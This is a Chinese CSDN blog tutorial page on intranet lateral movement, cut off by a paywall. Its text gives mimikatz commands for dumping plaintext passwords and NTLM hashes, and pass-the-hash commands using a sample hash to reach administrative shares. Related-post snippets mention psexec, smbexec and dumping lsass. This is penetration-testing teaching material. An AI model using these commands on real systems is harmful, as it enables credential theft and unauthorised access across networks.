内网横向渗透

最新推荐文章于 2024-07-24 09:45:22 发布
最新推荐文章于 2024-07-24 09:45:22 发布
阅读量1.7k 收藏 1
点赞数 1
文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68652890/article/details/124435022
版权
本文详细介绍了内网横向渗透的过程,包括信息搜集、利用mimikatz获取明文密码或NTLM哈希。接着,讨论了哈希传递(pass the hash pth)和票据传递(pass the ticket ptt)两种方法,以及如何通过Psexec、smbexec和Wmic工具在目标系统上执行命令。内容涉及了多个Windows系统管理工具的使用,强调了这些方法在安全领域的潜在风险。
摘要由CSDN通过智能技术生成

前期:信息搜集
mimikatz获取明文密码

mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords

在这里插入图片描述

在windows 2012以上系统 需要修改注册表搭配procdump+mimikatz 获取明文密码密码

哈希传递(pass the hash pth)

1.利用ntlm hash 进行哈希传递

连接工作组账户:

mimikatz # privilege::debug     //提升权限
mimikatz #sekurlsa::pth /user:administrator /domain:workgroup /ntlm:23ae064d483cef543b50d07fc48756c7  //传递哈希
dir \\192.168.1.3\c$         //ip连接
dir \\WIN7-X64\c$            //计算机名连接

在这里插入图片描述

连接域账户:

mimikatz # privilege::debug  //提升权限
mimikatz # sekurlsa::pth /user:tom /domain:HACKE /ntlm:23ae064d483cef543b50d07fc48756c7//传递哈希
c:\windows\system32> d
最低0.47元/天 解锁文章
Ki同学
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透-横向移动外部工具的使用
lza20001103的博客
10-01 2217
横向移动外部工具的使用 前言 文章目录横向移动外部工具的使用前言psexecSmbexecWmiexecmsf模块cs模块 psexec 首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话 在已获得的shell中输入 net use \192.168.52.141 /user:administrator “密码” (1)psexec https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec psexec使用 建立IPC连接,无需
内网横向渗透之各种传递攻击
技术超强的网络安全平台
05-06 2207
内网横向渗透之各种传递攻击 前言 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文或hash传递攻击进行横向渗透横向渗透 在拿下一台内网主机后,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的。我们掌握的方法越多,可能拿到的主机权限的机会就越大。 利用PsExec工具进行横向渗透 PsExec 最强大的功能之一是在远程系统和远程支持
15、基于psexec的域渗透测试工具—Smbexec v2.0
Fly_鹏程万里
06-14 2669
Smbexec V 2.0是一款基于psexec的域渗透测试工具,并配套Samba工具特性枚举登陆的域管理员 抓取hash 释放缓存令牌 (基于cachedump) 远程登录认证 抓取明文认证信息 Pop shells包括smbexec.sh installer.sh patches to compile binaries source for samba-3.6.9 and winexe-1.0...
内网渗透-域横向smb&wmin明文hash传递
weixin_60329395的博客
08-09 1734
该工具可配合minikatz进行明文获取,minikatz被查杀的情况下可使用tips:该工具为微软官方工具,不会被查杀Procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载成功后 导入到目标主机 使用CMD命令进行以下命令进行执行即使用该工具生成一个该主机的密码文件 执行成功,自动生成了一个lsass.dmp的文件 将该dmp文件放到自己本机上使用minikatz进行执行tips:将dmp文件放进min
内网渗透横向移动
balalawb的博客
11-01 76
横向移动
企业内网横向渗透检测和拦截实践.pdf
09-11
企业内网横向渗透检测和拦截实践 安全众测 网络安全 法律法规 渗透测试 移动安全
工控安全职业证书技能实践:内网横向渗透测试与实战.pptx
07-11
工控安全职业证书技能实践:内网横向渗透测试与实战.pptx
工控安全职业证书技能实践:内网横向渗透测试与实战.docx
07-13
【工控安全职业证书技能实践:内网横向渗透测试与实战】 工控安全涉及的是工业控制系统中的网络安全,它要求专业人士具备识别、防范和应对安全威胁的能力。本实践课程旨在教授学员如何进行内网横向渗透测试,模拟...
Nim-SMBExec:Nim中的SMBExec实现-使用NTLM身份验证和Pass-The-Hash技术的SMBv2
02-03
Nim-SMBExec:Nim中的SMBExec实现-使用NTLM身份验证和Pass-The-Hash技术的SMBv2
内网渗透思路整理与工具使用
12-08
内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用
内网渗透-smb&wmi
G208_522的博客
10-26 504
内网渗透系列
smbexec使用
weixin_45007073的博客
10-08 2124
smbexec使用安装工具说明主菜单项1主菜单项2 安装 首先我们现在Linux环境下安装smbexec这个工具,使用的是git clone这个命令 运行install.sh,安装脚本,将smbexec安装在本地的linux中,输入的命令为chmod +x install.sh && ./install.sh,因为我使用的是ubuntu系统,所以选择第一个安装选项 安装完成后,直接输入smbexec命令,会显示smbexec的主菜单 工具说明 主菜单项1 选项1用于扫描目标网络IP地址
内网渗透之IPC,远程执行
weixin_30699741的博客
01-23 746
开启服务 net start Schedule net start wmiApSrv 关闭防火墙 net stop sharedaccess net use \\目标IP\ipc$ "" /user:"administrator"进行连接 net use \\目标IP\ipc$ 试环境:主机(windows XP sp3)与windows XP sp2虚拟机)通...
横向移动-传递攻击SMB服务利用psexec&smbexec
m0_65096687的博客
05-28 1178
win2012以上版本,关闭了wdigest 或者安装了 KB287199补丁。无法获取明文密码总的来说就是win2012后无法获取明文密码解决办法就是:1.可以利用哈希hash传递(pth,ptk等进行移动)2.利用其他服务协议(SMB,WMI)进行哈希hash移动3.注册表开启wdigest Auth 进行获取明文密码4.利用第三方工具(hashcat)进行破解获取。
网络战时代的国家安全:策略、技术和国际合作
最新发布
2301_79955948的博客
07-24 1292
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
哪个邮箱最安全最好用啊
Zoho_Mail的博客
07-23 1374
Zoho企业邮箱,采用加密技术、反垃圾邮件和病毒保护,支持多因素认证,确保数据安全合规,同时提供易用性集成和移动应用。对公司,电子邮件可能带上商业计划、顾客信息、财务报表等保密信息,泄露可能导致竞争者掌握,危害企业的竞争优势与信誉。邮件炸弹进攻:很多垃圾短信的涌入可能导致邮箱服务器负荷,危害工作邮件的接收和推送,进而影响业务运作。登陆凭据、医疗记录、专利等敏感信息,一旦泄露,可能对个人或企业导致不可逆转的伤害。遵守国际安全标准和法规,如GDPR、HIPAA等,保证用户数据的合法处理和保护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值